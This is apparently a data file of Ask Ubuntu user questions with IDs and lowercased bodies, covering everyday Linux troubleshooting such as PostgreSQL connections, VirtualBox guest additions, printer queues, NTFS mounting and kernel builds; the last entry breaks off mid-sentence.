321462	how to run python- postgresql in ubuntu 12.04	i am trying to test pyhton-postgresql script in ubuntu 12.04 . the script is this : import psycopg2 import sys con = none try : con = psycopg2.connect ( database='mydb ' , user='myuser ' ) cur = con.cursor ( ) cur.execute ( `` sql '' ) con.commit ( ) except psycopg2.databaseerror , e : if con : con.rollback ( ) print 'error % s ' % e sys.exit ( 1 ) finally : if con : con.close ( ) and the error i get each time i run the script from the terminal ( python myscript.py ) is : error could not connect server : no such file or directory is the server running locally and accepting connection on unix domain socket `` /tmp/.s.pgsql.5432 '' ? i do n't have any idea what this mean , and i have been looking around for a while now . all to no avail . any help would be appreciated .
321463	how to obtain mail icon on the top panel ?	i just installed ubuntu 13.04 . in 12.04 i used gmail notifier and i had handy mail icon on the top panel . now with 13.04 i tried few email notifiers ( like gm-notifier or unity mail ) and i always ended up without mail icon on the top panel ... also , notification seems to not work.. even though i configured them and i have indicator-messages app . any ideas ?
321464	ca n't open shared folders on a virtual box	i created a virtual box of ubnutu 12.04 64 bit , installed on a host with the same system . i installed virtualbox guest additions on the guest , and restarted the guest . however , when i try to open `` shared folder '' on the guest , i still get a message saying that `` virtualbox guest additions are not available '' , and when i look at /media on the guest , i do n't see the shared folders.. i tried to install virtualbox guest additions again , and restarted the host and the guest again , but i still can not access the shared folders . any suggestions ? ..
321465	ambiguity using `` ls -l '' and `` file '' commands on a qcow file	i have a qcow2 file on my filesystem and i am trying to find the size of that file . for this , when i do a ls -l in the location where the file is stored , i get 13041664 , which means the file size is around 13 mb and when i do a file < filename > , i get : disk : qemu qcow image ( v2 ) , has backing file ( path /var/lib/nova/instances/_base/035db99541e92b5cca93bf18a997d626f ) , 21474836480 bytes which , i presume , says the filesize is around 21 gb . is this my misinterpretation of the command output or is something else going on inside the filesystem ( thin provisioning kind of thing ) ? update : when i do a ls -l on var/lib/nova/instances/_base/035db99541e92b5cca93bf18a997d626f , i get a ls : can not access /var/lib/nova/instances/_base/035db99541e92b5cca93bf18a997d626f : no such file or directory and its correct that i have no file there update 2 : the output of qemu-img info < filename > is as follows : image : disk file format : qcow2 virtual size : 20g ( 21474836480 bytes ) disk size : 12m cluster_size : 65536 backing file : /var/lib/nova/instances/_base/035db99541e92b5cca93bf18a997d626f512b73d ( actual path : /var/lib/nova/instances/_base/035db99541e92b5cca93bf18a997d626f512b73d )
321469	ubuntu desktop and server	i installed ubuntu server on a peripheral computer to a networks as i wanted to example it to a friend as a possible alternative . i also installed the desktop after but it wont boot the desktop automatically as i installed it second . how do i change it so the desktop boots automatically ?
321479	how to deploy charm to a machine which is already installed with some other charm ?	is it like we have release machine in maas then just do jitsu deploy-to `` machine name '' `` service name '' ?
321480	error in displaying local wordpress website	i have installed wordpress correctly on my xubuntu 12.04 and it works perfectly normal for my system , when i access the same on another system then it does n't show the page ui properly , means there is no js or css displayed . did i do something wrong ?
321483	problem with installing a python module	hi i am unable to download a python module dm.smlsec.binding 1.0b3 . the following error is what i get . i have attached my log file please help me sorting out /usr/local/bin/pip run on thu jul 18 12:23:36 2013 downloading/unpacking dm.xmlsec.binding running setup.py egg_info for package dm.xmlsec.binding traceback ( most recent call last ) : file `` < string > '' , line 16 , in < module > file `` /tmp/pip-build-student/dm.xmlsec.binding/setup.py '' , line 199 , in < module > **setupargs file `` /usr/lib/python2.7/distutils/core.py '' , line 112 , in setup _setup_distribution = dist = klass ( attrs ) file `` /usr/local/lib/python2.7/dist-packages/setuptools-0.6c11-py2.7.egg/setuptools/dist.py '' , line 260 , in __init__ file `` /usr/local/lib/python2.7/dist-packages/setuptools-0.6c11-py2.7.egg/setuptools/dist.py '' , line 284 , in fetch_build_eggs file `` /usr/local/lib/python2.7/dist-packages/setuptools-0.6c11-py2.7.egg/pkg_resources.py '' , line 569 , in resolve dist = best.get ( req.key ) pkg_resources.versionconflict : ( lxml 2.3.2 ( /usr/lib/python2.7/dist-packages ) , requirement.parse ( 'lxml > =3.0 ' ) ) complete output from command python setup.py egg_info : traceback ( most recent call last ) : file `` '' , line 16 , in file `` /tmp/pip-build-student/dm.xmlsec.binding/setup.py '' , line 199 , in **setupargs file `` /usr/lib/python2.7/distutils/core.py '' , line 112 , in setup _setup_distribution = dist = klass ( attrs ) file `` /usr/local/lib/python2.7/dist-packages/setuptools-0.6c11-py2.7.egg/setuptools/dist.py '' , line 260 , in init file `` /usr/local/lib/python2.7/dist-packages/setuptools-0.6c11-py2.7.egg/setuptools/dist.py '' , line 284 , in fetch_build_eggs file `` /usr/local/lib/python2.7/dist-packages/setuptools-0.6c11-py2.7.egg/pkg_resources.py '' , line 569 , in resolve dist = best.get ( req.key ) pkg_resources.versionconflict : ( lxml 2.3.2 ( /usr/lib/python2.7/dist-packages ) , requirement.parse ( 'lxml > =3.0 ' ) ) command python setup.py egg_info failed with error code 1 in /tmp/pip-build-student/dm.xmlsec.binding exception information : traceback ( most recent call last ) : file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/basecommand.py '' , line 139 , in main status = self.run ( options , args ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/commands/install.py '' , line 266 , in run requirement_set.prepare_files ( finder , force_root_egg_info=self.bundle , bundle=self.bundle ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/req.py '' , line 1057 , in prepare_files req_to_install.run_egg_info ( ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/req.py '' , line 236 , in run_egg_info command_desc='python setup.py egg_info ' ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/util.py '' , line 662 , in call_subprocess % ( command_desc , proc.returncode , cwd ) ) installationerror : command python setup.py egg_info failed with error code 1 in /tmp/pip-build-student/dm.xmlsec.binding
321487	pacakge installled succesfully but unable to import	i installed a python package libxmlsec1 using sudo spt-get install libxmlsec1 . i got the installation to be successful but when i try to import it in the python command line iam getting an import error . please help me in sortin out the error .
321490	change wireless interface name based on usb point	i have a wireless usb dongle connected to my computer , but which my system always labels as wlan1 . what i would really like to do is rename the interface based on which slot ttyusb0 or ttyusb1 it is plugged into . is this possible on ubuntu ?
321493	`` dpkg : error : requested operation requires superuser privilege '' . can not remove all configuration info from removed packages , sudo does n't work	i want to run this command ( see section 4 from here https : //help.ubuntu.com/community/aptget/howto # removal_commands ) : dpkg -l | grep '^rc ' | awk ' { print $ 2 } ' | xargs dpkg -- purge i use sudo at the beginning but anyway i get an error : user @ user-desktop : ~ $ sudo dpkg -l | grep '^rc ' | awk ' { print $ 2 } ' | xargs dpkg -- purge [ sudo ] password for user : dpkg : error : requested operation requires superuser privilege why sudo does n't work ? what else should i type ?
321507	cooja compiling error : msp430/bin/ld : can not find -lc	i updated msp430-gcc to 4.7.0 version in instantcontiki2.6 . when i simulate the hello-world example , it shows the following error : > make hello-world.sky target=sky msp430-gcc -dcontiki=1 -dcontiki_target_sky=1 -os -fno-strict-aliasing -ffunction-sections -wall -mmcu=msp430f1611 -g -i . -i../../platform/sky/ . -i../../platform/sky/dev -i../../platform/sky/apps -i../../platform/sky/net -i../../cpu/msp430/f1xxx -i../../cpu/msp430/ . -i../../cpu/msp430/dev -i../../core/dev -i../../core/lib -i../../core/net -i../../core/net/mac -i../../core/net/rime -i../../core/net/rpl -i../../core/sys -i../../core/cfs -i../../core/ctk -i../../core/lib/ctk -i../../core/loader -i../../core/ . -i../../platform/sky/ -dautostart_enable -c hello-world.c -o hello-world.co msp430-gcc -dcontiki=1 -dcontiki_target_sky=1 -os -fno-strict-aliasing -ffunction-sections -wall -mmcu=msp430f1611 -g -i . -i../../platform/sky/ . -i../../platform/sky/dev -i../../platform/sky/apps -i../../platform/sky/net -i../../cpu/msp430/f1xxx -i../../cpu/msp430/ . -i../../cpu/msp430/dev -i../../core/dev -i../../core/lib -i../../core/net -i../../core/net/mac -i../../core/net/rime -i../../core/net/rpl -i../../core/sys -i../../core/cfs -i../../core/ctk -i../../core/lib/ctk -i../../core/loader -i../../core/ . -i../../platform/sky/ -mmd -c ../../platform/sky/./contiki-sky-main.c -o obj_sky/contiki-sky-main.o msp430-gcc -mmcu=msp430f1611 -wl , -map=contiki-sky.map -wl , -- gc-sections , -- undefined=_reset_vector__ , -- undefined=interruptvectors , -- undefined=_copy_data_init__ , -- undefined=_clear_bss_init__ , -- undefined=_end_of_init__ hello-world.co obj_sky/contiki-sky-main.o contiki-sky.a -o hello-world.sky /usr/local/msp430/lib/gcc/msp430/4.7.0/../../../../msp430/bin/ld : can not find -lc collect2 : error : ld returned 1 exit status rm obj_sky/contiki-sky-main.o hello-world.co make : *** [ hello-world.sky ] error 1 process returned error code 2 i read the post from : msp430/bin/ld : can not find -lc . but sarwarul does n't detail the answer . does anyone have any idea ?
321510	set context menu key to function as right control	dell notebooks in brazil and possibly other countries no longer ship with a right control key . this is bad for ergonomics , so i would like to set the context menu key to function as right control . how may this be done ?
321511	problem in wireshark with logical interface	i add two logical interfaces to test with the following command : # set link on physical device up sudo ip link set up dev eth0 # create logical interfaces sudo ip link add link eth0 dev meth0 address 00:00:8f:00:00:02 type macvlan sudo ip link add link meth0 dev meth1 address 00:00:8f:00:00:03 type macvlan # order ip addresses and link sudo ip addr add 192.168.56.5/26 dev meth0 sudo ip addr add 192.168.56.6/26 dev meth1 sudo ip link set up dev meth0 sudo ip link set up dev meth1 meth0 link encap : ethernet hwaddr 00:00:8f:00:00:02 inet addr:192.168.56.5 bcast:0.0.0.0 mask:255.255.255.192 inet6 addr : fe80 : :200:8fff : fe00:2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:35749 errors:0 dropped:47 overruns:0 frame:0 tx packets:131 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3830628 ( 3.8 mb ) tx bytes:15278 ( 15.2 kb ) meth1 link encap : ethernet hwaddr 00:00:8f:00:00:03 inet addr:192.168.56.6 bcast:0.0.0.0 mask:255.255.255.192 inet6 addr : fe80 : :200:8fff : fe00:3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:35749 errors:0 dropped:47 overruns:0 frame:0 tx packets:115 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3830628 ( 3.8 mb ) tx bytes:14942 ( 14.9 kb ) i run `` wireshark '' to test traffic between meth0 and meth1 , so i execute ping 192.168.56.6 to generate icmp traffic . but details of this traffic does n't appear in wireshark . is there a problem in wireshark with logical interface ?
321512	how to set or clear usb keyboard leds	i am using ubuntu 12.04 and i need to control my customized usb keyboard keys & leds . the keys are working well . when i tried with a standard keyboard ( having num , scroll , caps lock leds ) , i couldnt succeed with writing led status bits . i dont want to use console based kb ioctl calls to control leds . is there any way to control directly using ioctl or write function at driver space . below is the code i tried : kb = open ( /dev/input/event2 , o_rdwr ) ; char kbname [ 256 ] = `` key-x123 '' ; char ledstatus = 0 ; ioctl ( kb , eviocgname ( sizeof ( kbname ) ) , kbname ) ; ioctl ( kb , eviocgbit ( ev_led , sizeof ( ledstatus ) ) , & ledstatus ) ; ioctl ( kb , eviocgled ( sizeof ( ledstatus ) ) , & ledstatus ) ; all these calls are working well and i could reak keys . but unable to set any leds . do not find any macros like eviocgled to set leds through ioctl ( 2 ) . i tried below code as well which throws `` invalid parameter '' error . struct input_event event ; event.type = ev_led ; event.code = led_numl | led_capsl | led_scrolll ; event.value = 7 ; if ( write ( kb , & event , sizeof ( struct input_event ) ) < 0 )
321513	ubuntu app development cookbook	is there any book available for studying ubuntu sdk . the documentation may be enough , but it lacks a real flow . after the introduction chapters it becomes a bit confusing . i really want to do application development on ubuntu and i am not getting from where to study about qml and the ubuntu sdk . is there any pdf version of the cookbook available at here ?
321516	nvidia® geforce® gt 330m : driver problem	my system ( toshiba satellite a660-167 core i7-740 ) overheats and turns off . this happens when i play videos online , youtube or any other sites . i used psensor to check the temperatures . normal temperature is about 70-80 celsius . when i watch videos , the temperature gradually increases until it reaches 100° c and the computer turns off . i suspect this is a problem with the video drivers , but the driver seems to be updated . i have an nvidia® geforce® gt 330m 1gb .
321522	terminal window appears after login ?	04.4lts version my system works fine but yesterday i just reinstalled wine and in the process of installing it started responding slowly as i am unaware of that situation , started pressing esc and alt+ctrl+del keys continuously and after a while it started working fine . then i restarted it . and when i did the restart , after i successfully logged in , a terminal window pops up instead of the desktop . what should i do to start my pc normally ? the problem persists after i shutdown and restart as well . the commands are working fine when i typed in the terminal but i ca n't get my home screen and access it just like other pc . i am new to ubuntu ! ! ! please provide step by step procedure . thanks in advance ! ! !
321525	how to connect a `` calculator '' button on a keyboard with a call of a calculator ?	i have a calculator button on my keyboard . under windows it starts windows calculator . but under xubuntu ( but with kubuntu-desktop ) it starts nothing , it is inactive . to start a calculator i have to choose it from application > utilities now . how may i connect calculator button with calculator to start it as in windows .
321530	install ubuntu after win8 can not find ubuntu	my computer : thinkpad t430 origin os : win8_64 install ubuntu with usb , but , after install ubuntu , i can not find the ubuntu no choose to select ubuntu thanks
321531	grub rescue command . grub not working in ubuntu 13	i have dual boot ubuntu and windows . when i started my machine , it started with grub rescue > command . i researched this , but could n't solve the problem , so i tried to reinstall windows 7 and deleted the ubuntu hard drive . this did n't solve the problem . and now i have a screen saying grub rescue > without ubuntu installed in my laptop . so what can i do to to recover from this ? ? remember , i deleted the ubuntu setup files installed on my laptop
321532	how to make ubuntu 13.04 work with displaylink monitor ?	i recently purchased an aoc e2251fwu displaylink monitor . when i plug this into my system76 gazelle professional running ubuntu 13.04 raring ringtail , nothing happens . under 'displays ' , no additional display is detected . on mac and windows , this monitor is plug-and-play after installing displaylink 's drivers . having read that previous versions of ubuntu had plug and play support for displaylink monitors , i 'm surprised that ubuntu 13.04 does not ! the 'xserver-xorg-displaylink ' driver is not available in the 13.04 repositories . i read that it has become baked into the linux kernel . does anybody know how to get a displaylink device to actually work on ubuntu 13.04 ? i 'm looking to get a simple extended display . i 've done my due dilligence and googled around , but no solution i can find works for me . > uname -a linux tyrion 3.8.0-26-generic # 38-ubuntu smp mon jun 17 21:43:33 utc 2013 x86_64 x86_64 x86_64 gnu/linux > lsmod module size used by joydev 17377 0 pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 23479 0 vboxdrv 320372 3 vboxnetadp , vboxnetflt , vboxpci parport_pc 28152 0 ppdev 17073 0 rfcomm 42641 0 bnep 18036 2 bluetooth 228619 10 bnep , rfcomm ip6t_reject 12545 1 snd_hda_codec_hdmi 36913 1 xt_hl 12521 6 ip6t_rt 12529 3 snd_hda_codec_via 51018 1 coretemp 13355 0 kvm_intel 132891 0 nf_conntrack_ipv6 18335 7 nf_defrag_ipv6 13201 1 nf_conntrack_ipv6 snd_hda_intel 39619 3 kvm 443165 1 kvm_intel ipt_reject 12541 1 xt_comment 12504 4 arc4 12615 2 xt_log 17400 10 snd_hda_codec 136453 3 snd_hda_codec_hdmi , snd_hda_codec_via , snd_hda_intel xt_multiport 12597 4 snd_hwdep 13602 1 snd_hda_codec xt_limit 12711 13 xt_tcpudp 12603 22 snd_pcm 97451 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel xt_addrtype 12635 4 iwldvm 241872 0 uvcvideo 80847 0 nf_conntrack_ipv4 14487 7 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel nf_defrag_ipv4 12729 1 nf_conntrack_ipv4 snd_seq_midi 13324 0 xt_state 12578 14 snd_seq_midi_event 14899 1 snd_seq_midi mac80211 606457 1 iwldvm videobuf2_vmalloc 13056 1 uvcvideo videobuf2_memops 13202 1 videobuf2_vmalloc snd_rawmidi 30180 1 snd_seq_midi videobuf2_core 40513 1 uvcvideo videodev 129260 2 uvcvideo , videobuf2_core ip6table_filter 12815 1 ip6_tables 27025 1 ip6table_filter snd_seq 61554 2 snd_seq_midi_event , snd_seq_midi nf_conntrack_netbios_ns 12665 0 nf_conntrack_broadcast 12589 1 nf_conntrack_netbios_ns snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29425 2 snd_pcm , snd_seq nf_nat_ftp 12620 0 nf_nat 25867 1 nf_nat_ftp iwlwifi 173477 1 iwldvm nf_conntrack_ftp 13342 1 nf_nat_ftp nf_conntrack 83275 8 nf_nat_ftp , nf_conntrack_netbios_ns , nf_nat , xt_state , nf_conntrack_broadcast , nf_conntrack_ftp , nf_conntrack_ipv4 , nf_conntrack_ipv6 microcode 22881 0 snd 68876 16 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_via , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device iptable_filter 12810 1 ip_tables 26995 1 iptable_filter psmouse 95870 0 rtsx_pci_ms 13011 0 cfg80211 510937 3 iwlwifi , mac80211 , iwldvm lp 17759 0 soundcore 12680 1 snd mei 41158 0 lpc_ich 17061 0 memstick 16554 1 rtsx_pci_ms serio_raw 13215 0 mac_hid 13205 0 x_tables 29803 15 ip6table_filter , xt_hl , xt_comment , ip_tables , xt_tcpudp , xt_limit , xt_state , xt_log , xt_multiport , iptable_filter , ip6t_rt , ipt_reject , ip6_tables , xt_addrtype , ip6t_reject parport 46345 3 lp , ppdev , parport_pc dm_crypt 22820 1 udl 24771 0 drm_usb 13134 1 udl syscopyarea 12529 1 udl sysfillrect 12701 1 udl sysimgblt 12674 1 udl rtsx_pci_sdmmc 17475 0 ghash_clmulni_intel 13259 0 aesni_intel 55399 4 aes_x86_64 17255 1 aesni_intel xts 12885 1 aesni_intel lrw 13257 1 aesni_intel gf128mul 14951 2 lrw , xts ablk_helper 13597 1 aesni_intel cryptd 20373 4 ghash_clmulni_intel , aesni_intel , ablk_helper i915 600396 4 i2c_algo_bit 13413 1 i915 wmi 19070 0 drm_kms_helper 49394 2 udl , i915 video 19390 1 i915 ahci 25731 2 drm 286028 7 udl , i915 , drm_usb , drm_kms_helper libahci 31364 1 ahci r8169 67446 0 rtsx_pci 33355 2 rtsx_pci_ms , rtsx_pci_sdmmc
321543	how can i rename or alias an lpr cups queue name ?	i plugged a printer into ubuntu and it was instantly configured . amazing ! now i want to share that printer on the network , so i 've told cups to do that and i can print to the printer using ipp : //10.67.5.3/printers/hp-laserjet-p3005 . so i know it works . also i 've set up xinetd and cups-lpd ( part of the cups-bsd package ) to be able to print to it using lpd . however i have 20 machines on this network all set up to print to lpd : //10.67.5.3/lp1 which is the address of the previous print server . i 'd like to tell the ubuntu machine to use lp1 as the lpr queue name for hp-laserjet-p3005 as this would mean i do n't have to reconfigure 20 machines . is this possible ( it must be ! ) ? either renaming the queue ( which was auto-generated ) or providing an alias ?
321556	downgrading a package with older version `` physically '' in the repository	i want to downgrade from openjdk update 25 to openjdk update 21 . if i look , for example , at security.ubuntu.com or at mirror.pnl.gov , i can see that .deb files for update 21 are still there , however , when i use apt-cache show or aptitude , i only see update 25 and update 3 , and if i try : aptitude -s install openjdk-7-jre-headless=7u21-2.3.9-0ubuntu0.12.04.1 i get : unable to find a version `` 7u21-2.3.9-0ubuntu0.12.04.1 '' for the package `` openjdk-7-jre-headless '' is there any way i can downgrade using apt tools ? if the only option is dpkg , will this package be `` visible '' for aptitude , for example , when resolving dependencies ?
321558	want printer to pause after printing one page ( to let me reverse )	i am using ubuntu 12.10 and have a samsung scx3200 series mfp . problem statement : suppose i have multiple pages to print but i want to print both sides . to do so , i must print one page at a time and invert the page . what i want : i want to give one single print command for printing more than one pages and printer should wait for me after printing every single page . i do n't know if that is even possible , but thought i should check it out . thanks in advance
321563	how to install vmware workstation 9 graphically on ubuntu 13.04	i have vmware workstation 9 with .bundle extension . when i install it i need to configure it graphically during installation . with gui i can insert license key . but when i install it , it processes through command line and it never asks me for license key . after installation i ca n't enter license key too . when i press enter license key button nothing happens . so i think i should enter it during installation . but i do n't know how to install it through gui .
321567	mounting my windows drive	if you would be so kind to explain and answer my dilemma , i 'd be grateful of all of you . here is the error : error mounting /dev/sda1 at /media/ubuntu/system : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/ubuntu/system '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . problem : i can not mount my system or `` windows '' drive . in the first place , it said i can not boot windows , so i got ubuntu instead . so after trying to get my 800gb windows drive back , this error popped up . any help would be wonderful .
321569	how to install mysql db 5.6.12 ( downloaded from mysql.com ) on xubuntu ( kubuntu-desktop ) 13.04 ?	i have an experience of setting up and running mysql on windows . it is really easy . i just downloaded .zip , unpacked it in c : \mysql , placed c : \mysql\bin to path and then ran the server with the command : c : \ > mysqld -- console all the databases were stored in c : \mysql\data folder . and i want to do the same on xubuntu 13.04 ( but kubuntu-desktop ) . but i do n't understand how . linux version of mysql is different . here are my steps : i downloaded mysql community server from http : //dev.mysql.com/downloads/mysql/ . so i got this file : mysql-5.7.1_m11-4.linux_glibc2.5.i386.rpm-bundle.tar then i unpacked it to /opt/mysql . and instead of /bin directory i got 7 files there . and i do n't know what to do with them now : path : /opt/mysql-5.7.1_m11-4.linux_glibc2.5.i386.rpm-bundle/ mysql-client-5.7.1_m11-4.linux_glibc2.5.i386.rpm mysql-devel-5.7.1_m11-4.linux_glibc2.5.i386.rpm mysql-embedded-5.7.1_m11-4.linux_glibc2.5.i386.rpm mysql-server-5.7.1_m11-4.linux_glibc2.5.i386.rpm mysql-shared-5.7.1_m11-4.linux_glibc2.5.i386.rpm mysql-shared-compat-5.7.1_m11-4.linux_glibc2.5.i386.rpm mysql-test-5.7.1_m11-4.linux_glibc2.5.i386.rpm i suspect that mysql-server-5.7.1_m11-4.linux_glibc2.5.i386.rpm is the mysql db server as i ran on windows . but how to install it ? how to run it ? i do n't want mysql server to start automaticly on system boot . i want to start it manually as i did on windows . what do i need to do to install mysql the same way i used it on windows ?
321570	can anybody help me get drivers for canon pixma mp110 for ubuntu ?	i 'm a newbie to ubuntu can anybody help me sort out drivers for my printer i 've tried to add it in system settings - printer , but it does not show my model which is mp110 it shows pixma mp140,150,160 and so on but not mine ? it comes up with gutenprint and i click forward it then asks to choose driver so i click canon and then shows model numbers but it does not show my model number which is a pixma mp110 ? can anybody help please ? as i 'm a newbie ( 4 days old ) so please give a step by step guide please ? thanks and best regards steve .
321575	got stuck with dual boot installation	i purchased a sony vaio laptop in which windows 8 operating system is preinstalled . i got my project a project which needs unix as an operating system . hence i started trying to install ubuntu 13.04 i followed the steps displayed in the following : http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows the last i.e step 7 i am not able to get ... my system is not showing the option boot menu inorder to choose ubuntu ... ... kindly can anyone guide with further steps..
321579	how to create a profile in keryx for an offline machine ?	i have installed keryx . when i ran keryx in my windows 7 , i did n't find any premade profile for my ubuntu 13.04 . so i have to create a new profile in keryx but i do n't know how to do that . please help to create a new profile for ubuntu 13.04 . another problem is that when i tried to run the file keryx.py in ubuntu 13.04 using the terminal , it tells to check whether another keryx file is running or not .
321582	ubuntu gui crashed	i was trying to install the copy.com client for linux . i was copying the libraries for it into /usr/lib/x86_64-linux-gnu/ when the screen went black . i have done a hard shutdown and turned the computer back on and it says it is in low graphics mode . if i try to use any of the options the screen goes black again . i did a ctrl-alt-f1 to get to console mode and i have logged on . what do i do now ?
321585	how to get skype to open on start-up ?	i want skype to open automatically on start-up . so i got the instructions ... start-up applications > add . then i get a window with three fields . in the first i write `` skype '' . in the second i cut and paste the code : /usr/bin/skype as instructed . in the third field i write `` internet telephony '' . i then press add… and all i get is another box . the application simply will not load . i have tried every possible permutation of that code , with no result . this has taken months of trying and i still ca n't get skype to open on startu-up !
321587	how install sqlite3 from scratch	i 'm trying to install sqlite3 , but so far i 'm unsuccessful . i tried following command sudo apt-get install sqlite3 but i get the following error : i 've tried the solution in `` need help installing sqlite3 '' without success . i 'm using ubuntu 12.04 lts version .
321589	unable to mount the cd/dvd image on the machine sandbox	i installed ubuntu 12.10 server amd 64 with virtualbox 4.2 latest version . i 've installed it successfully . i 've to install now guest additions but i am getting a error message like the below exactly same unable to mount the cd/dvd image /usr/share/virtualbox/vboxguestadditions.iso on the machine sandbox . would you like to force mounting of this medium ? could not mount the media/drive '/usr/share/virtualbox/vboxguestadditions.iso' ( verr_pdm_media_locked ) . details result code : ns_error_failure ( 0x80004005 ) result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } callee : imachine { 22781af3-1c96-4126-9edf-67a020e0e858 } i research a lot with google and other places and i removed the installation disc image from ~/.virtualbox/virtualbox.xml file to edit a line but did n't get any luck i installeddkms too but still did n't get any luck can anyone please help me about that ? i am stuck now : (
321597	13.04 video & flash player flickering using gnome shell	setup ubuntu 13.04 x64 graphics card : ati hd 7850 graphics drivers : i have the proprietary drivers cpu : i7 2600k ram : 8gb problems firefox : html5 and css3 stuff sometimes behaving strange/sloppy chrome & chromium : same as firefox + additional flickering sometimes on youtube videos ( not always ) vlc player/totem : flickering ( sometimes when the video player is small , flickering stops )
321598	getting access to wi-fi internet while being on a ubuntu lve cd	i have a problem with my windows 7 laptop that wo n't start . i need to fix my d : drive partition but to do so , i would have to get access to wi-fi internet and i 'm on the ubuntu live cd usb stick and so far , i could n't get access to wi-fi internet . is there a way ?
321605	installing skype on ubunti 10.04	i am a complete novice and want to install skype on ubuntu 10.04 . please can someone give me step by step instructions . `` download and install skype for ubuntu 10.04 32-bit '' just is n't enough . i have downloaded the file to my downloads folder but do n't know what to do next . thanks .
321607	x11 initialization problem while disabling ipv6	i am getting this error whenever i try to edit the /etc/sysctl.conf file : ( gedit:8114 ) : warning ** : command line `dbus-launch -- autolaunch=0a05f0b5ab33a20fb928363b00000005 -- binary-syntax -- close-stderr' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n can not open display : can anyone help me on this ?
321615	laptop with a touchscreen : how to configure specific screen gestures in 12.04	i got nice laptop with a touchscreen ( hp envy tm m7 ) . it came pre-installed with windows 8 and i promptly put ubuntu on it . due to some issues , 13.04 would n't work so i went with the 12.04.02 lts instead . the touchscreen worked out of the box when it comes to clicking , but i wonder if there is a way to add more tablet-like gestures such as 2-finger pinch zooming , or scrolling with a one-finger swipe , or cycling through open applications by swiping from the screen edge etc . google results are in most cases only concerned with touchpad gestures . here is the weird thing : two-finger gestures work on the touchpad ( e.g . the two-finger scrolling ) and can be changed in the `` mouse and touchpad '' panel . three-finger gestures such as pinch to maximize or four-finger tap to open dash do only work on the touchscreen . what i can not seem to configure is two-finger scrolling on the touchscreen , as there is in general no settings panel for the touchscreen .
321625	not able to install unity tweak in ubuntu 12.04 : 404 not found error	while installing unity tweak , i am getting following error : sudo add-apt-repository ppa : freyja-dev/unity-tweak-tool-daily sudo apt-get update sudo apt-get install unity-tweak-tool w : failed to fetch http : //ppa.launchpad.net/freyja-dev/unity-tweak-tool-daily/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/freyja-dev/unity-tweak-tool-daily/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
321628	fan twirling because of cpu high performance	i 've downloaded kubuntu recently and installed it on my laptop . after installation , i installed my graphic card driver ( ati radeon hd ) which made my laptop 's fan quieter . this also caused that my laptop 's fan speed and responsiveness decreased . it even stops when it 's in idle mode . when i run low-load tasks such as internet surfing , the fan spins at a low speed but constantly and for long period ( untile i 'm surding web ) . i think my system is using cpu at its maximum level . i want to find a way to put cpu performance in powersave mode ( the lowest mood ) to decrease its templrature and also to decrease fan speed . how can i change my cpu performance to power save mode ? is there any program to do this ?
321633	how to create dvd from a video file ?	i 'm trying to create a dvd image from a .ts file but all dvd-maker programs i tried ( devede , bombono ) output .mpg files instead of the desired image with video_ts , audio_ts folders and .vob files inside .
321635	apache2-prefork-dev missing in saucy ?	i am trying to build my package ( which works fine on precise , quantal , raring ) in launchpad , but on saucy i get this error : the following packages have unmet dependencies : apache2-prefork-dev : depends : apache2.2-common ( = 2.2.22-6ubuntu5 ) but it is not going to be installed is this package deprecated ? or is there just some trouble in the saucy development pool ?
321637	customizing kernel	i have read and attempted to follow every link for customizing ubuntu 's kernel including : build your own kernel - ubuntu wiki - # i started with this one and could not continue when i got to the step referencing fakeroot /debian/rules because debian directory did not exist . kernel/compile ( last updated 3/5/2013 ) # again , do n't have debian folder what 's a simple way to recompile the kernel ? i get everything downloaded ( except for the packages which no longer exist ) . but after that , i ca n't go any further : i 've downloaded source of all kernels for this release : git clone git : //kernel.ubuntu.com/ubuntu/ubuntu-precise.git and moved it to the /usr/src/ubuntu-precise directory and although i could not locate or find the debian folder it was under /usr/src/ubuntu-precise/debian . perhaps because i did not have the symbolic link ? renamed the older version source directory and created a symbolic link for ubuntu-precise with the same name . this was in a book ubuntu unleashed page 426 . i 've downloaded/installed the build environment : sudo apt-get build-dep linux-image- $ ( uname-r ) following the directions on the second link above , i installed the packages indicated : sudo apt-get install linux-kernel-devel fakeroot -kernel-wedge buid-essential ( linux-kernel devel not found ) removed and continued with others because it is supposedly now part of the build-dep linux ... etc . this only installed fakeroot because all others were there . also installed : sudo apt-get install crash kexec-tools makedumpfuile sudo apt-get build-dep linux # which did not install or update sudo apt-get install git-core libncurse5 libncurse5-dev libelf-dev asciidoc binutils-dev sudo apt-get install kernel-package sudo apt-get install ccaches and last but not least sudo apt-get install libnewt-dev # which was already there and did not install since i had now tried this several times , i had to : $ make-kpkg # to clean source directories $ make mrproper # to clean all subdirectories of source restore the .config deleted by 